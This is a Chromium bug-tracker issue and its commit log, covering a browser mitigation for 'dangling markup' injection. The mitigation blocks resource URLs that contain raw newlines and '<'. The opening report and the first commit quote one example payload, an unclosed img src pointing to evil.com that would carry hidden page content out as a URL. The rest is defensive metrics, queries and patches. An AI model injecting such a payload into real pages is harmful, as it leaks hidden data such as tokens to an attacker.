New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 680970 link

Starred by 9 users
Status: Fixed
Owner:
mkwst@chromium.org
Buried. Ping if important.
Closed: Jul 2017
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 3
Type: Bug

Blocking:
issue 680969
issue 738849
issue 695474



Sign in to add a comment

`<img src='` eats the page until the next `'`.

Project Member Reported by mkwst@chromium.org, Jan 13 2017 
Because HTML is fairly lax in parsing attribute values, injecting something like `<img src='https://evil.com/?whatever=` can expose otherwise hidden values by eating up elements and their attributes, and resolving them as a URL.

Perhaps we could restrict the character set allowed in `src`/`href` attributes to bring them in-line with CSS's rules for `url('`. That is, perhaps we should stop resolving URLs that contain newline characters? Or braces? Or both? It's not clear whether we can do something about this by default, but worst case, we could allow an opt-in to stricter parsing.

Metrics first, then a proposal to HTML folks.

Comment 1 by mkwst@chromium.org, Jan 13 2017 

(Unescaped newlines or braces, that is. Something like `%0A` is fine, whereas `\n` is indicative of a dangling `'`)
Project Member

Comment 2 by bugdroid1@chromium.org, Jan 14 2017 

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/63ec3598c662f32715148c25faf99771c9d1cb6c

commit 63ec3598c662f32715148c25faf99771c9d1cb6c
Author: mkwst <mkwst@chromium.org>
Date: Sat Jan 14 06:12:45 2017

Measure URL resolution with raw newlines and braces.

Because HTML is fairly lax in parsing attribute values, injecting
something like `<img src='https://evil.com/?whatever=` can expose
otherwise hidden values by eating up elements and their attributes, and
resolving them as a URL.

Perhaps we could restrict the character set allowed in `src`/`href`
attributes to bring them in-line with CSS's rules for `url('`. That
is, perhaps we should stop resolving URLs that contain raw newline
characters (`\n`)? Or braces (`<`)? Or both? It's not clear whether we
can do something about this by default, so let's add metrics and see
what we see.

BUG= 680970 
R=jochen@chromium.org

Review-Url: https://codereview.chromium.org/2629393002
Cr-Commit-Position: refs/heads/master@{#443793}

[modify] https://crrev.com/63ec3598c662f32715148c25faf99771c9d1cb6c/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/63ec3598c662f32715148c25faf99771c9d1cb6c/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/63ec3598c662f32715148c25faf99771c9d1cb6c/tools/metrics/histograms/histograms.xml

Comment 3 by zcorpan@gmail.com, Jan 17 2017 

Newlines (ignoring leading/trailing only) in src/href in httparchive:

SELECT * FROM (
SELECT page, url, REGEXP_EXTRACT(LOWER(body), r'(<[a-z][^>]+\s+(?:src|href)\s*=\s*(?:"\s*(?:[^"\s]+\s*(?:\r|\n)+\s*[^"\s]+)+\s*"|\'\s*(?:[^\'\s]+\s*(?:\r|\n)+\s*[^\'\s]+)+\s*\')[^>]+>)') AS match
FROM [httparchive:har.2017_01_01_chrome_requests_bodies]
)
WHERE page = url
AND match != "null"
AND NOT REGEXP_MATCH(match, r'["\']\s*\+') # exclude JS string concats


1771 results. https://gist.github.com/zcorpan/aef7b5628010c988b0fa505e9f4ca468

Of those, 26 also have a <. https://gist.github.com/zcorpan/d3a143d7267f441eed3bedea4424f594

(Didn't query for only <.)

Comment 4 by mkwst@chromium.org, Jan 17 2017 

Wow. That's a regex. Thank you! :)

Visually inspecting the `\n` + `<` results at https://gist.github.com/zcorpan/d3a143d7267f441eed3bedea4424f594 is encouraging. There's a good deal of commented-out code that's caught up in the regex. http://www.nikonisti.ro/ looks like a typo that wouldn't work in the status-quo either, as does http://www.receive-smsonline.com/ and http://www.cyclenews.com/.

Let's see what the use counter looks like. The current patch up at https://codereview.chromium.org/2634893003 should give us a reasonable estimate of how often we'd actually end up blocking a resource load because of both a raw newline and less-than. I'm hopeful that it's not a large number. :)
Project Member

Comment 5 by bugdroid1@chromium.org, Jan 17 2017 

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/cd87dfc6f638a6d64b2311d35a58cb1969116915

commit cd87dfc6f638a6d64b2311d35a58cb1969116915
Author: mkwst <mkwst@chromium.org>
Date: Tue Jan 17 13:42:25 2017

Experiment with blocking resolution of HTTP URLs containing '\n' and '<'.

Following up on the metrics added in https://codereview.chromium.org/2629393002,
this patch adds a flag that will prevent URL resolution if the URL string
contains a raw newline and less than sign. It also refines the metrics by
excluding non-HTTP (e.g. `data:`, `javascript:`, `file:`) URLs, as those are quite
likely to contain `<`, and quite unlikely to result in exfiltration (as they don't
hit the network).

Let's see how the data looks.

Intent to Implement: https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/rOs6YRyBEpw/D3pzVwGJAgAJ

BUG= 680970 

Review-Url: https://codereview.chromium.org/2634893003
Cr-Commit-Position: refs/heads/master@{#444040}

[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/resources/helper.js
[add] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute.html
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/Source/platform/RuntimeEnabledFeatures.in
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/tools/metrics/histograms/histograms.xml

Comment 6 by zcorpan@gmail.com, Jan 17 2017 

I noticed now the [^>]+ should have been [^>]*, but for `img` at least it shouldn't make any difference most of the time...
Project Member

Comment 7 by bugdroid1@chromium.org, Jan 19 2017 

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/41318f4888c1f60613c74cc86e539d173b16b0ad

commit 41318f4888c1f60613c74cc86e539d173b16b0ad
Author: mkwst <mkwst@chromium.org>
Date: Thu Jan 19 15:11:50 2017

Reduce the perf overhead of our dangling markup experiments.

Given that Document::completeURL is a hotspot, this patch revamps the
approach to capture removed whitespace up in //url (where we're already
scanning through the string), and limits the scan for '<' to cases in
which we've actually removed whitespace.

BUG= 680970 , 682300
R=jochen@chromium.org

Review-Url: https://codereview.chromium.org/2643613002
Cr-Commit-Position: refs/heads/master@{#444734}

[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/platform/weborigin/KURL.h
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/platform/weborigin/KURLTest.cpp
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/tools/metrics/histograms/histograms.xml
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/url/third_party/mozilla/url_parse.cc
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/url/third_party/mozilla/url_parse.h
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/url/url_util.cc

Comment 8 by palmer@chromium.org, Mar 24 2017

Blocking: 695474
Project Member

Comment 9 by bugdroid1@chromium.org, Apr 7 2017 

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/58eb768aa18cf83d0ac4b30d339ee1a778ee582a

commit 58eb768aa18cf83d0ac4b30d339ee1a778ee582a
Author: mkwst <mkwst@chromium.org>
Date: Fri Apr 07 18:29:09 2017

Experimentally block/deprecate resource requests whose URLs contain raw newlines.

Intent to Deprecate: https://groups.google.com/a/chromium.org/d/msg/blink-dev/AqSrOMzwrlk/wUglQnTJCgAJ

BUG= 680970 

Review-Url: https://codereview.chromium.org/2794303002
Cr-Commit-Position: refs/heads/master@{#462933}

[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/bindings/blink-in-js-asan-crash-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/compositing/iframes/iframe-in-composited-layer-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/editing/pasteboard/dragstart-contains-default-content-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-canvas-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-image-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/css/counters/counter-traverse-table-cell-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-body-quirk-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-html-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/constructors/track-event-constructor-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/drag-and-drop-autoscroll-inner-frame-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/resize-subframe-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/touch/gesture/long-press-focuses-frame-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/files/null-origin-string-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/frames/content-opacity-1-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/frames/negative-remaining-length-crash-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/loader/simultaneous-reloads-assert-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/loader/stateobjects/pushstate-in-data-url-denied-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-zero-size-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-nested-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-focusable-content-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-scrollable-content-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-recursive-offset-parent-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-with-offscreen-focusable-element-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fullscreen/full-screen-iframe-without-allow-attribute-allowed-from-parent-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/local/absolute-url-strip-whitespace-expected.txt
[add] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute.html
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/document-all-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/no-indexeddb-from-sandbox-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-top-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-can-navigate-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-control-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-when-allowed-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/sandboxed-opener-can-close-window-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/window-named-proto-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/window-named-valueOf-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/access-control-basic-allow-access-control-origin-header-data-url-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/newline-in-request-uri-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/android/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/fast/text/selection-hard-linebreak-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/mac/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/win/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/win/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/win/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/plugins/createScriptableObject-before-start-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/printing/subframes-percentage-height-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/svg/custom/g-outside-svg-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/svg/custom/large-image-pattern-crash-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/frame/Deprecation.cpp
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/loader/FrameFetchContext.cpp
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/platform/RuntimeEnabledFeatures.json5
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/tools/metrics/histograms/histograms.xml
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/url/gurl_unittest.cc
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/url/third_party/mozilla/url_parse.cc
Project Member

Comment 10 by bugdroid1@chromium.org, May 18 2017 

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/c9d6c1bb4234256176f66cc8c61c9878c931950a

commit c9d6c1bb4234256176f66cc8c61c9878c931950a
Author: mkwst <mkwst@chromium.org>
Date: Thu May 18 15:05:22 2017

Set 'whitespace_removed' correctly when resolving relative URLs.

The previous two (!!!) patches missed the relative URL resolution path
through KURL and url_utils. This patch pokes at the logic one more time.

BUG= 680970 

Review-Url: https://codereview.chromium.org/2890143002
Cr-Commit-Position: refs/heads/master@{#472812}

[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/third_party/WebKit/LayoutTests/fast/loader/url-strip-cr-lf-tab-expected.txt
[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/third_party/WebKit/Source/platform/weborigin/KURLTest.cpp
[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/url/url_canon_relative.cc
[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/url/url_util_unittest.cc
Project Member

Comment 11 by bugdroid1@chromium.org, May 24 2017 

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/9e5ae901660de47ef1b844c6113eae91b5ae8e9e

commit 9e5ae901660de47ef1b844c6113eae91b5ae8e9e
Author: Mike West <mkwst@google.com>
Date: Wed May 24 17:43:18 2017

Update dangling markup mitigations.

Still behind a flag, just updating the checks to look for both `\n` and
`<` rather than just the former. This is in line with the patches up at
https://github.com/whatwg/url/pull/284 and
https://github.com/whatwg/fetch/pull/519.

Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ.

Bug:  680970 
Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840
Reviewed-on: https://chromium-review.googlesource.com/514024
Commit-Queue: Mike West <mkwst@chromium.org>
Reviewed-by: Jochen Eisinger <jochen@chromium.org>
Cr-Commit-Position: refs/heads/master@{#474341}
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/FlagExpectations/enable-blink-features=LayoutNG
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/bindings/blink-in-js-asan-crash-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/compositing/iframes/iframe-in-composited-layer-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/editing/pasteboard/dragstart-contains-default-content-expected.txt
[add] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/external/wpt/fetch/dangling-markup-mitigation.tentative.html
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-canvas-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-image-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/css/counters/counter-traverse-table-cell-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-body-quirk-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-html-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/constructors/track-event-constructor-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/drag-and-drop-autoscroll-inner-frame-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/resize-subframe-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/touch/gesture/long-press-focuses-frame-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/files/null-origin-string-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/frames/content-opacity-1-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/frames/negative-remaining-length-crash-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/loader/simultaneous-reloads-assert-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/loader/stateobjects/pushstate-in-data-url-denied-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/loader/url-strip-cr-lf-tab-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-zero-size-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-nested-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-focusable-content-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-scrollable-content-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-recursive-offset-parent-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-with-offscreen-focusable-element-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fullscreen/full-screen-iframe-without-allow-attribute-allowed-from-parent-expected.txt
[delete] https://crrev.com/373106c8b302f73d26b4e971b4c0fe1d3fdeeb41/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute-expected.txt
[delete] https://crrev.com/373106c8b302f73d26b4e971b4c0fe1d3fdeeb41/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute.html
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/document-all-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/no-indexeddb-from-sandbox-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-top-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-can-navigate-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-control-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-when-allowed-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/sandboxed-opener-can-close-window-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/window-named-proto-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/window-named-valueOf-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/access-control-basic-allow-access-control-origin-header-data-url-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/newline-in-request-uri-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/linux/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/linux/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/linux/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/mac/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/win/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/win/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/win/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/plugins/createScriptableObject-before-start-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/printing/subframes-percentage-height-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/svg/custom/g-outside-svg-expected.txt
